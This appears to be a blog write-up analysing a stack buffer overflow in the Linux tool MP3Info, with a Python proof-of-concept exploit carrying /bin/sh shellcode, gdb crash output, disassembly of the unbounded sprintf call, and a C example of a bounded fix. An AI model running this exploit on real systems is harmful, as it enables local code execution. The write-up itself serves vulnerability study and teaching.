Author: k0shl. Please indicate the source when reprinting: http://whereisk0shl.top
```python
# Original PoC (Python 2). Garbled escapes restored; imports added.
import errno
import subprocess

junk = "\x90\x90\x90\x90" * 8
shellcode = "\x31\xc0\x50\x68/\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
buffer = "\x90\x90\x90\x90" * 89
eip = "\x10\xf0\xff\xbf"

print "# MP3info is prone to a Stack-BoF"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes"

try:
    # The malformed string is simply passed to mp3info as its command-line argument
    subprocess.call(["mp3info", junk + shellcode + buffer + eip])
except OSError as e:
    if e.errno == errno.ENOENT:
        print "MP3Info not found!"
    else:
        print "Error executing exploit"
        raise
```
This vulnerability is a local code execution vulnerability. The PoC really just calls mp3info and passes the malformed string on the command line; you can pass the malformed string directly with $(python -c ...) just as well. Open the binary in gdb and run it with the $(python -c ...) malformed string to arrive directly at the crash scene. This is the first Linux vulnerability I have debugged; it is a fairly basic and representative one.
This vulnerability is my first Linux analysis post, hereby commemorated! I picked up a lot of new Linux debugging methods, which was very rewarding.
This vulnerability is not quite as the details above describe. While processing the MP3 path, the path cannot be read, so the program enters its error-handling routine; the erroneous file path is passed as the error message to Linux's perror() function, and it is during that processing that the error occurs, entering the SEH exception function, and arbitrary code execution is obtained by overwriting the SEH pointer. A detailed analysis of this vulnerability follows.
First of all, we need to compile MP3Info under Linux. You need to install the libncurses5-dev header-file dependency; after that MP3Info can be compiled. After compiling, instead of using the PoC, we pass the malformed string in directly with python.
```
root@root:~/Desktop/mp3info-0.8.5a# ./mp3info $(python -c 'print "\x41"*100')
Error opening MP3: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory
root@root:~/Desktop/mp3info-0.8.5a# ./mp3info $(python -c 'print "\x41"*700')
Segmentation fault
```
You can see that when the length of the malformed string reaches 700, a Segmentation fault is reported, that is, an invalid pointer access or a buffer overflow has occurred. We use gdb-peda to look at the information at the time of the crash.
The first is the crash point.
```
[-------------------------------------code-------------------------------------]
   0xb7e067cb <__GI_getenv+107>:	mov    esi,DWORD PTR [ebp+0x0]
   0xb7e067ce <__GI_getenv+110>:	test   esi,esi
   0xb7e067d0 <__GI_getenv+112>:	je     0xb7e0682a <__GI_getenv+202>
=> 0xb7e067d2 <__GI_getenv+114>:	cmp    di,WORD PTR [esi]
```
You can see that the error occurs at the cmp comparison instruction, so we can basically conclude that the esi register holds a non-readable address.
```
[----------------------------------registers-----------------------------------]
EAX: 0x6
EBX: 0xb7f7c000 --> 0x1a5da8
ECX: 0x414c ('LA')
EDX: 0xffbab8be
ESI: 0x41414141 ('AAAA')
```
You can see that the ESI value really is the unreadable address 0x41414141, so now we look back at the call stack (backtrace).
```
    at getenv.c:85
    categoryname=0xb7f1c953 <_nl_category_names+51> "LC_MESSAGES", category=<optimized out>) at dcigettext.c:1356
    domainname=domainname@entry=0xb7f32fae <_libc_intl_domainname> "libc", msgid1=msgid1@entry=0xb7f336a5 "File name too long", msgid2=msgid2@entry=0x0, plural=plural@entry=0x0, n=n@entry=0x0, category=category@entry=0x5) at dcigettext.c:561
    domainname=0xb7f32fae <_libc_intl_domainname> "libc", msgid=0xb7f336a5 "File name too long", category=category@entry=0x5) at dcgettext.c:52
    buf=buf@entry=0xbfffea20 "@\360\377\267", buflen=buflen@entry=0x400) at _strerror.c:71
    s=s@entry=0xbffff040 "Error opening MP3: ", 'A' <repeats 181 times>..., errnum=errnum@entry=0x24) at perror.c:37
    s=0xbffff040 "Error opening MP3: ", 'A' <repeats 181 times>...) at perror.c:74
    argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at mp3info.c:195
Backtrace stopped: previous frame inner to this frame (corrupt stack?)
```
We mainly look at the call site at 0x08049597, because after it execution enters the system library function; so we take 0x08049597 as the starting point for the analysis.
Open the ELF file in IDA and look at the call at 0x08049597.
```
loc_804957B:                            ; fp = eax ; FILE *
    lea     edi, [ebp+error_msg]        ; fp = edx ; FILE *
    push    eax
    push    dword ptr [esi]
    push    offset aErrorOpeningMp      ; "Error opening MP3: %s"
    push    edi                         ; s
    call    _sprintf
    mov     [esp], edi                  ; s
    call    _perror
```
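As an added example (not mp3info's own code; the buffer size, function names and the 'A'-filled input are assumptions for illustration), the unbounded sprintf() pattern the disassembly shows, next to a bounded version that reports truncation instead of overwriting the stack frame:

```c
#include <stdio.h>
#include <string.h>
#define ERROR_MSG_SIZE 256  /* assumed size of the fixed stack buffer */

/* Vulnerable shape (what the disassembly above does): sprintf() copies the
 * whole caller-supplied path into a fixed stack buffer with no bound, so a
 * longer path overwrites the saved frame. For comparison only; never called. */
void report_open_error_unsafe(const char *filename)
{
    char error_msg[ERROR_MSG_SIZE];
    sprintf(error_msg, "Error opening MP3: %s", filename);
    perror(error_msg);
}

/* Hardened shape: snprintf() never writes past out_size bytes and always
 * NUL-terminates; its return value is the length the message would have
 * had, so truncation is detectable. Returns 1 if it fit, 0 if truncated. */
int format_open_error(char *out, size_t out_size, const char *filename)
{
    int needed = snprintf(out, out_size, "Error opening MP3: %s", filename);
    if (needed < 0) {       /* encoding error: emit an empty message */
        out[0] = '\0';
        return 0;
    }
    return (size_t)needed < out_size;
}

int report_open_error_safe(const char *filename)
{
    char error_msg[ERROR_MSG_SIZE];
    int fit = format_open_error(error_msg, sizeof error_msg, filename);
    perror(error_msg);      /* errno still holds the open() failure */
    return fit;
}

/* Constructed input: a path of `len` 'A's, like the $(python -c ...) argument
 * above. Returns 1 if it fits the bounded formatter, 0 if it is truncated. */
int probe_name_length(size_t len)
{
    static char name[1024];
    if (len >= sizeof name)
        len = sizeof name - 1;
    memset(name, 'A', len);
    name[len] = '\0';
    return report_open_error_safe(name);
}

int main(int argc, char **argv)
{
    return report_open_error_safe(argc > 1 ? argv[1] : "missing.mp3") ? 0 : 1;
}
```

With the 700-byte argument from the session above, the bounded version prints a truncated message and returns 0 rather than crashing inside perror().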